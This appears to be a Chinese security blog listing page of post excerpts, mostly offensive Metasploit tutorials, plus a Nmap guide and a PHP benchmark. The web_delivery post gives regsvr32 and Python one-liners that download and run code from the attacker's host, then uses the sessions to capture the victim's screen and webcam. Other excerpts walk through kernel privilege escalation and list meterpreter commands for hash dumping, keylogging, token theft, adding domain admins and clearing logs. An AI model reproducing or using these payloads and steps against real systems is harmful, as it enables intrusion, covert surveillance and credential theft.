泓源视野-网络安全_python基础教程_linux常用命令_wordpress-(第25页)

精选导读

更多

最新文章

更多
  • msf web_delivery模块攻击(win7以上通杀)

    msf web_delivery模块攻击(win7以上通杀)

    网络安全
    目标机:win10                          ip:192.168.0.117 攻击机:kai liunx                      ip:192.168.0.102 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索web_delivery模块,search web_delivery 3.使用命令use exploit/windows/misc/regsvr32_applocker_bypass_server 4.设置攻击机ip,set lhost 192.168.0.102 5.运行,run 6.复制生成的regsvr32 /s /n /u /i:http://192.168.0.102:8080/zfgJrh6V.sct scrobj.dll,拿到目标机win10上去运行(杀毒软件可能会杀掉) 7.回到攻击机kai liunx就可以看到已经成功监听,并返回了一个session 8.输入sessions,查看session内容 9.输入命令sessions 1,这样就控制到了目标机了 10.截取当前桌面屏幕 11.通过摄像头拍照,webcam_snap 小小ps了一下 12.打开摄像头开直播,webcam_stream 打开浏览器就可以看到直播了 小编这里上面爆照了就不出直播了 13.小闹剧完了,开始正题,ctrl+c退出出来,输入shell,来到我们熟悉的界面,随便执行一个命令看看 目标机:win10 装有python                         ip:192.168.0.117 攻击机:kai liunx                      ip:192.168.0.102 二.使用web_delivery模块的 1.打开神器metasploit,终端输入msfconsole 2.搜索web_delivery模块,search web_delivery 3.使用命令use exploit/multi/script/web_delivery 4.设置攻击机Ip,set lhost 192.168.0.102 5.运行,exploit,生成payload:   python -c "import sys; u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.102:8080/UrY3oE');exec(r.read());" 6.复制payload到目标机上面运行 7.返回kai liunx攻击机,已经反弹回了一个session 8.输入命令sessions 1进入,成功获取了目标机 温馨提示:这些功能完全可以结合着office漏洞一起使用,非常的nice,当然必须要是windows7或以上的才可以,正常途径拿到shell,但是不能上传也可以试试用这个,然后用upload上传文件 感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
  • Windows证书对话框权限提升漏洞(CVE-2019-1388)

    Windows证书对话框权限提升漏洞(CVE-2019-1388)

    网络安全
    【漏洞详情】该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System。因为用户可以与该UI交互,因此对UI来说紧限制是必须的。否则,低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作。即使隔离状态的看似无害的UI特征都可能会成为引发任意控制的动作链的第一步。事实上,UAC会话中含有尽可能少的点击操作选项。利用该漏洞很容易就可以提升权限到SYSTEM。【验证工具】hhupd.exehttps://pan.baidu.com/s/1C4qfCUe8nK_MhPsSD_WSVQ提取码:0msb【验证详情】影响版本 SERVER Windows 2008r2 7601 ** link OPENED AS SYSTEM **Windows 2012r2 9600 ** link OPENED AS SYSTEM **Windows 2016 14393 ** link OPENED AS SYSTEM **Windows 2019 17763 link NOT opened WORKSTATION Windows 7 SP1 7601 ** link OPENED AS SYSTEM **Windows 8 9200 ** link OPENED AS SYSTEM **Windows 8.1 9600 ** link OPENED AS SYSTEM **Windows 10 1511 10240 ** link OPENED AS SYSTEM **Windows 10 1607 14393 **…
  • Nmap详细参考指南

    Nmap详细参考指南

    linux 网络安全
    Nmap扫描原理与用法:http://blog.csdn.net/aspirationflow/article/details/7694274 Nmap速查手册:http://wooyun.tangscan.cn/static/drops/tips-4333.html 扫描神器nmap最佳实践使用:http://blog.csdn.net/qq_29277155/article/details/50971727 使用nmap 验证多种漏洞:http://blog.csdn.net/jiangliuzheng/article/details/51992220 在nmap运行时直接按键盘的d键打“断点”,按下X键可以知道运行的进度 Nmap参考指南(Man Page) 描述 nmap :  网络探测工具和安全/端口扫描器。 nmap [ <扫描类型> ...] [ <选项> ] { <扫描目标说明> } nmap -T4 -A -p- 10.10.210.60         Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些 主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核, 许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息, 管理服务升级计划,以及监视主机和服务的运行。         Nmap输出的是扫描目标的列表,以及每个目标的补充信息,至于是哪些信息则依赖于所使用的选项。 “所感兴趣的端口表格”是其中的关键。那张表列出端口号,协议,服务名称和状态。状态可能是 open(开放的),filtered(被过滤的), closed(关闭的),或者unfiltered(未被过滤的)。 Open(开放的)意味着目标机器上的应用程序正在该端口监听连接/报文。 filtered(被过滤的) 意味着防火墙,过滤器或者其它网络障碍阻止了该端口被访问,Nmap无法得知 它是 open(开放的) 还是 closed(关闭的)。closed(关闭的) 端口没有应用程序在它上面监听,但是他们随时可能开放。 当端口对Nmap的探测做出响应,但是Nmap无法确定它们是关闭还是开放时,这些端口就被认为是 unfiltered(未被过滤的) 如果Nmap报告状态组合 open|filtered 和 closed|filtered时,那说明Nmap无法确定该端口处于两个状态中的哪一个状态。 当要求进行版本探测时,端口表也可以包含软件的版本信息。当要求进行IP协议扫描时 (-sO),Nmap提供关于所支持的IP协议而不是正在监听的端口的信息。         除了所感兴趣的端口表,Nmap还能提供关于目标机的进一步信息,包括反向域名,操作系统猜测,设备类型,和MAC地址。         一个典型的Nmap扫描如例 1 “一个典型的Nmap扫描”所示。在这个例子中,唯一的选项是-A, 用来进行操作系统及其版本的探测,-T4 可以加快执行速度,接着是两个目标主机名。一个典型的Nmap扫描 译注 该Nmap参考指南中文版由Fei Yang <[email protected]>和Lei Li<[email protected]> 从英文版本翻译而来。 我们希望这将使全世界使用中文的人们更了解Nmap,但我们不能保证该译本和官方的 英文版本一样完整,也不能保证同步更新。 它可以在Creative Commons Attribution License下被修改并重新发布。 nmap 选项概要 选项(Options)。 当Nmap不带选项运行时,该选项概要会被输出,最新的版本在这里 http://www.insecure.org/nmap/data/nmap.usage.txt。 它帮助人们记住最常用的选项,但不能替代本手册其余深入的文档,一些晦涩的选项甚至不在这里。 Nmap 7.25BETA1…
  • windows内核提权

    windows内核提权

    网络安全
    Windows内核提权SoftNight  原文:http://www.hackingarticles.in/windows-kernel-exploit-privilege-escalation/ 大家好,上一篇文章中,我们讨论了使用自动化脚本进行Windows提权的向量。今天我们来演示通过内核利用技巧来提权。为此,我们将使用metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。 目录Windows-Expolit-suggesterWindows ClientCopyImage Win32k ExploitWindows TrackPopupMenu Win32k NULL Pointer Dereference通过Kitrap0D进行Windows系统提权Windows Escalate任务计划程序XML提权MS16-016mrxdav.sys WebDav本地提权EPATHOBJ::pprFlattenRec本地提权MS13-053 : NTUserMessageCall Win32k内核池溢出MS16-032 Secondary Logon Handle提权RottenPotato提权 windows-Exploit-suggestermetasploit内置模块提供了很多可以进行提权的本地exp,并且根据架构,平台(运行的操作系统),会话类型和默认选项来推荐最合适的exp。这大大节省了我们的时间,因为我们不用再去手动搜索本地exp了。 用法:注意:我们首先要获取目标主机的meterpreter会话,才能使用这个模块。而且在使用这个模块之前,我们需要先把当前的meterpreter会话放到后台运行(CTRL+Z)现在我们获取到的meterpreter会话是1,执行下列命令: use post/multi/recon/local_exploit_suggester set LHOST 192.168.1.107 set SESSION 1 exploit 如图所示,显示了目标主机存在的漏洞和可以提权的后渗透利用exp。 Windows ClientCopyImage Win32k ExploitWindows内核模式驱动程序中的漏洞让攻击者可以进行提权。这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。 这个模块已经在win7×64和×86,win2008R2 SP1×64上进行过测试。现在,我们打开MSF控制台并执行这个exp,命令如下: use exploit/windows/local/ms15_051_client_copy_image set lhost 192.168.1.107 set session 1 exploit 一旦这个选中的exp得到执行,我们就得到了另外一个meterpreter会话,然后执行命令查看系统信息,如图:如你所见,系统当前登陆的用户是Windows特权用户 NT AUTHORITY\SYSTEM Windows TrackPopupMenu Win32k NULL Pointer Dereference该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。现在打开MSF控制台,执行exp: use exploit/windows/local/ms14_058_track_popup_menu set…
  • windwos 自动化提权脚本

    windwos 自动化提权脚本

    网络安全
    Windows自动化脚本提权SoftNight  原文:http://www.hackingarticles.in/window-privilege-escalation-via-automated-script/ 大家都知道,当我们入侵了一台服务器并拿到了低权限shell时需要进行提权。本文就来讲解如何提权并判断哪些低权限的shell可以提升到高级权限。 目录介绍提权向量windows-Exploit-SuggesterWindows Gather Applied PatchessherlockJAWS—另一种Windows遍历脚本PowerUp 介绍提权一般是在攻击者已经成功入侵受害者的主机后的一个过程,在这个过程中,攻击者要尝试收集关于系统的更多关键信息,比如隐藏的密码和某些配置不当的服务与应用等。所有这些信息都会帮助攻击者对受害主机进行后渗透以便拿到高权限的shell。 提权向量下面这些信息是Windows系统中的关键信息:操作系统版本已安装或正在运行的存在漏洞的安装包具有完全控制或修改权限的文件和文件夹映射驱动器引人注意的异常文件不带引号的服务路径网络信息(接口,arp,netstat等)防火墙状态和规则运行进程AlwaysInstallElevated注册表项检查存储的凭证DLL劫持计划任务 在渗透测试过程中,有一些脚本能够帮你快速识别Windows系统中的提权向量,本文我们就来一一详细讲解。 Windows-Exploit-suggester如果你已经获得了受害主机的低权限meterpreter会话或者命令会话,那么你就可以使用这个脚本。这个脚本会告诉你本地可用的exp。这些给出的exp是根据受害主机的操作系统平台和架构,还有根据本地可用的exp来选择的。需要注意的是,并不是所有的exp都可以有效利用。需要根据下列条件来选择exp:会话类型,平台,架构还有所需的默认选项等。使用该脚本非常简单,输入下列命令即可: use post/multi/recon/local_exploit_suggester msf post(local_exploit_suggester) > set lhost 192.168.1.107 msf post(local_exploit_suggester) > set session 1 msf post(local_exploit_suggester) > exploit 从图片中可以看到,脚本已经检测出了哪些exp可以利用并且能够进行提权。 Windows Gather Applied Patches这个模块会根据WMI查询的结果来遍历Windows系统中安装的补丁,WMI查询语句如下: SELECT HotFixID FROM Win32_QuickFixEngineering 脚本用法: use post/windows/gather/enum_patches msf post(enum_patches) > set session 1 msf post(enum_patches) > exploit 如图所示,该脚本已经根据补丁显示了受害主机存在哪些漏洞和对应的能够提权的exp。 sherlock这是一个Powershell脚本,能够快速找到缺失的软件补丁并进行本地提权。这个脚本跟上面的脚本类似,能够找到受害主机存在哪些漏洞和对应的可以提权的exp。 使用下面的命令从GitHub上下载脚本,当你获取一个受害主机的meterpreter会话时执行脚本,如下所示: git clone https://github.com/rasta-mouse/Sherlock.git 由于这个脚本是在powershell中执行的,所以需要先加载powershell,然后再导入这个下载的脚本: load powershell powershell_import '/root/Desktop/Sherlock/Sherlock.ps1' powershell_execute “find-allvulns” 上面的命令会输出目标靶机存在的漏洞和可以用来提权的exp,如图: JAWS—另一个Windows遍历脚本JAWS也是一个powershell脚本,目的是为了帮助渗透测试员和CTF选手快速识别Windows主机上的提权向量。该脚本是用powershell2.0编写的,所以在win7之后的主机上都可以运行。当前功能网络信息收集(接口,arp,netstat)防火墙状态和规则运行的进程具有完全控制权限的文件和文件夹映射驱动器引人注意的异常文件不带引号的服务路径近期使用的文档系统安装文件AlwaysInstallElevted注册表项检查存储的凭证安装的应用潜在的漏洞服务MuiCache文件计划任务 使用下面的命令下载脚本: git clone https://github.com/411Hall/JAWS.git 一旦你获得了meterpreter会话,上传这个脚本然后在命令行中执行: powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1…
  • Windows内核漏洞利用提权教程

    Windows内核漏洞利用提权教程

    网络安全
    PS. 本文仅限于技术讨论,严禁用于其他用途。 继上一篇“使用自动化脚本进行Windows提权”,本文将介绍有关Windows内核漏洞提权的方法。我将使用内置的Metasploit模块作为演示。通过本文的学习,你将了解系统的哪些部分可被利用,并匹配最佳可利用模块进一步的提升权限。 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此,但也并非所有列出的local exploits都可用。所以,无论是漏洞利用还是查找最好的办法就是自动结合手动。 用法 注:要使用local exploit suggester,我们必须已在目标机器上获取到了一个Meterpreter session。在运行Local Exploit suggester之前,我们需要将现有的Meterpreter session调到后台运行(CTRL + Z) 示例,假设我们现在有一个Meterpreter session 1 use post/multi/recon/local_exploit_suggester set LHOST 192.168.1.107 set SESSION 1 exploit 如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用模块。 Windows ClientCopyImage Win32k Exploit Windows内核模式驱动程序特权提升漏洞。此模块利用了win32k.sys内核模式驱动程序中的不正确对象处理进行提权。 该模块已在Windows 7 x64和x86,Windows 2008 R2 SP1 x64的易受攻击版本上进行了测试。 让我们转到MSF控制台并执行该漏洞的exploit模块 use exploit/windows/local/ms15_051_client_copy_image set lhost 192.168.1.107 set session 1 exploit 一旦exploit成功执行,就会打开另一个Meterpreter session getsystem getuid 可以看到,我们当前的用户权限已提升为了NT AUTHORITY\SYSTEM Windows TrackPopupMenu Win32k NULL指针解引用 此模块利用了win32k.sys中的NULL指针解引用,漏洞可通过TrackPopupMenu函数进行触发。在特殊情况下,我们可以滥用在xxxSendMessageTimeout上的NULL指针解引用,来实现任意代码执行操作。 该模块已在Windows XP SP3,Windows Server 2003 SP2,Windows 7 SP1 Windows Server 2008 32位和Windows…
  • Meterpreter的简单介绍

    Meterpreter的简单介绍

    网络安全
    Meterpreter 是MSF自带一个强大的SHELL,可以执行很多功能。 Meterpreter SHELL 基本操作 meterpreter>background #session隐藏到后台 meterpreter>bgkill #杀掉后台的一个meterpreter meterpreter>bglist #列出后台的meterpreter meterpreter>bgrun #运行后台的一个meterpreter msf> sessions -l #查看回话session的list msf> sessions 4 #切回四号回话,用于和background反操作 查看系统信息 meterpreter>sysinfo #获取系统信息 meterpreter>getuid #获取当前注入的用户名称 转移注入进程 meterpreter>ps #查看进程list meterpreter>migrate pid #转移注入点的继承 转移注入进程后,源进程被杀掉,并不影响meterpreter的会话 文件和路径类的操作 meterpreter>ls meterpreter>pwd meterpreter>mkdir meterpreter>mv meterpreter>rm meterpreter>rmdir #以上常见操作不在赘述 meterpreter>show_mount #展示磁盘情况 meterpreter>search -d c:\\ -f *.doc # -d 路径 -f 文件名模式 搜索文件 例如搜索日志文件 *.evtx meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上传文件 meterpreter>download c:\\xxx\xxx.xxx /root/... #下载文件 meterpreter>edit xxx #编辑文件,VIM的 网络配置及其命令 meterpreter>arp #展示arp meterpreter>getproxy #获取代理信息 meterpreter>ifconfig(ipconfig) #查看网卡信息 meterpreter>route #打印路由…
  • [后渗透]获取到 Meterpreter 之后的操作

    [后渗透]获取到 Meterpreter 之后的操作

    网络安全
    本文章向大家介绍[后渗透]获取到 Meterpreter 之后的操作,主要包括[后渗透]获取到 Meterpreter 之后的操作使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。sysinfo列出受控主机的系统信息 ls列出目标主机的文件和文件夹信息 use priv加载特权提升扩展模块,来扩展meterpreter库 ps显示所有运行进程以及关联的用户账户 getsystem通过各种攻击向量来提升到系统用户权限 shell以所有可用令牌来运行一个交互的shell screenshot对目标主机的屏幕进行截图 upload file向目标主机上传文件 download file从目标主机下载文件 keyscan_dump存储目标主机上或许的键盘记录 getprivs尽可能多的获取目标主机上的特权 background将你当前的meterpreter shell转为后台执行 hashdump导出目标主机中的口令哈希值help打开帮助 run scriptname运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名 migrate PID迁移到一个指定的进程ID use incognito加载inconito功能(用来盗取目标主机的令牌或是假冒用户) list_tokens -u列出目标主机用户组的可用令牌 impersonate_token DOMAIN_NAME\USERNAME假冒目标主机上的可用令牌。 steal_token盗窃给定进程的可用令牌并进行令牌假冒 drop_token停止假冒当前的令牌execute -f cmd.exe -i执行cmd.exe命令并进行交互。 execute -f cmd.exe -i -t以所有可用令牌来执行cmd命令。 execute -f cmd.exe -i -H -t以所有可用令牌来执行cmd命令并隐藏该进程。rev2self回到控制目标主机的初始用户账户下。 reg command在目标主机注册表中进行交互,创建,删除和查询等操作。 setdesktop number切换到另一个用户界面(该功能基于那些用户已登录)。 uietl enable keyboard/mouse接管目标主机的键盘和鼠标。use sniffer加载嗅探模块 sniffer_interfaces列出目标主机所有开放的网络接口 sniffer_dump interfaceID pcapname在目标主机上启动嗅探 sniffer_start interfaceID packet_buffer在目标主机上针对特定范围的数据包缓冲区启动嗅探 sniffer_stats interfaceID获取正在实施嗅探网络接口的统计数据 sniffer_stop interfaceID停止嗅探add_user username password -h ip在远程目标主机上添加一个用户 add_group_user “Domain Adimins”username -h ip将用户添加到目标主机的域管理员组中 clearev清除目标主机上的日志记录…
  • 权威的PHP 5.6、7.0、7.1、7.2、7.3和7.4 php运行效率基准测试

    权威的PHP 5.6、7.0、7.1、7.2、7.3和7.4 php运行效率基准测试

    linux wordpress
    权威的5.6、7.0、7.1、7.2、7.3和7.4 PHP基准(2020)通过布莱恩·杰克逊(Brian Jackson) • 更新于2020年4月22日 每年,我们都会在各种平台上发布深入的性能基准测试,以了解不同版本的PHP如何相互竞争。这次我们再次全力以赴,对 22种不同平台/配置的6种不同PHP版本进行了 基准测试;包括WordPress,Drupal,Joomla!,Laravel,Symfony等。我们还测试了流行的电子商务解决方案,例如WooCommerce,Easy Digital Downloads,Magento,Grav CMS和October CMS。 免费试用我们一直鼓励WordPress用户利用最新 支持的PHP版本。它们不仅更安全,而且还提供了其他性能改进。我们也不是只在谈论WordPress,这在所有平台上都是如此。今天我们将向您展示PHP 7.4如何帮助我们克服一切挑战!? 我们在6个不同的PHP版本上测试了22个平台/配置的性能,而#PHP 7.4在17/17(5 N / A)上获得了金牌。??点击鸣叫社区和Kinsta中PHP的状况PHP是一种开放源代码的服务器端脚本和编程语言,主要用于Web开发。大部分核心WordPress软件都是用PHP编写的,这使PHP成为WordPress社区非常重要的语言。有很多优秀的PHP教程,您想学习这种编程语言。 有人可能会争辩说 PHP已经死了。但是,即使开发人员喜欢声明这一点,PHP仍然比以往更活跃,更快,更好。根据W3Techs,使用服务器端编程语言的所有网站中,有78.9%以上使用PHP 。那是很多依赖PHP的网站。 但是,社区中的一个大问题是,许多人仍在使用旧的不受支持的PHP版本。根据 WordPress统计,只有38.3%的人在受支持的PHP版本(7.2或更高版本)上运行。这引入了性能和安全性问题。 为什么会这样呢?以下是我们通常会看到的一些常见原因: 缺乏对社区进行有关PHP是什么及其在WordPress如何发挥作用方面的重要作用的教育。并非每个人都精通技术,这还可以。在较新版本的PHP上运行的插件和主题的兼容性问题。WordPress托管提供商不愿推出新版本,因为担心会出现问题。为了尝试帮助社区向前发展,Kinsta采用了与PHP 相同的寿命终止(EOL)时间表。这有助于确保您的WordPress网站尽可能快和 安全。 Kinsta客户如何与普通的WordPress社区对抗?我们自己很好奇,所以我们看了一些数字。 Kinsta托管的网站的PHP版本Kinsta托管的网站的PHP版本 这是摘要: Kinsta的WordPress网站中有25.8%运行的是PHP 7.2。Kinsta上有68.6%的WordPress网站正在运行PHP 7.3。Kinsta的4.7%WordPress网站都在运行PHP 7.4。我们正在努力实现最终的<1%。?我们为发现这些数字感到骄傲和兴奋。这意味着Kinsta客户中PHP的采用率非常高!比一般的WordPress人口高很多。 在Kinsta托管的所有WordPress网站中,高达73.3%运行的是PHP 7.3或更高版本!?点击鸣叫PHP基准测试(2020)即使不再正式支持PHP 5.6、7.0和7.1,仍然有很多WordPress网站在运行。因此,我们决定测试所有六个不同的PHP版本,以便您可以看到较新的版本在性能方面能给您带来多少好处。 对于每个测试,我们使用每个平台的最新版本,并以15个并发用户为基准对主页进行一分钟的基准测试。以下是我们测试环境的详细信息。 使用的计算机: Intel®Xeon®CPU(30 CPU,120 GB RAM,1TB SSD)。这是由Google Cloud Platform提供支持并在隔离的容器中运行的“计算优化”(C2)计算机。所有Kinsta托管计划都提供C2机器。操作系统: Ubuntu 18.04.3 LTS(GNU / Linux 5.0.0-1026-gcp x86_64)堆栈: Nginx 1.17.6,MariaDB 10.4.10PHP版本: 5.6、7.0、7.1、7.2、7.3、7.4。注意: 在某些CMS / Frameworks中,我们还安装了其他PHP软件包,以满足其新要求或与Composer依赖关系。页面缓存: 在所有配置和平台上均禁用。OPcache:对于WordPress,Joomla和Drupal,我们使用了官方的Docker映像。其余的我们使用相同的映像设置,并使用以下推荐的php.ini设置启用了OPcache ,但该 opcache.max_accelerated_files 值从4,000增加到50,000。opcache.memory_consumption=128opcache.interned_strings_buffer=8opcache.max_accelerated_files=50000opcache.revalidate_freq=60opcache.fast_shutdown=1opcache.enable_cli=1OPcache通过将预编译的脚本字节码存储在共享内存中来提高PHP性能,从而消除了PHP在每个请求上加载和解析脚本的需求。 这些测试是由Kinsta的WordPress贡献者和Web开发人员Thoriq Firdaus执行的。 经过测试的平台和配置我们的测试包括以下22种平台/配置。在某些情况下,由于缺乏对特定PHP版本的支持,我们不得不测试多个版本。单击下面的一个可直接跳至其测试说明和结果。数据以每秒请求数衡量。请求越多越好。 WordPress 5.3WordPress 5.3 + WooCommerce 3.8.1WordPress 5.3…

精选视频

精选优质视频,皮克斯优秀动画短片,BBS 优秀纪录片,丰富您的视听体验。
更多
您是第8233136 位访客, 您的IP是:[172.70.34.74]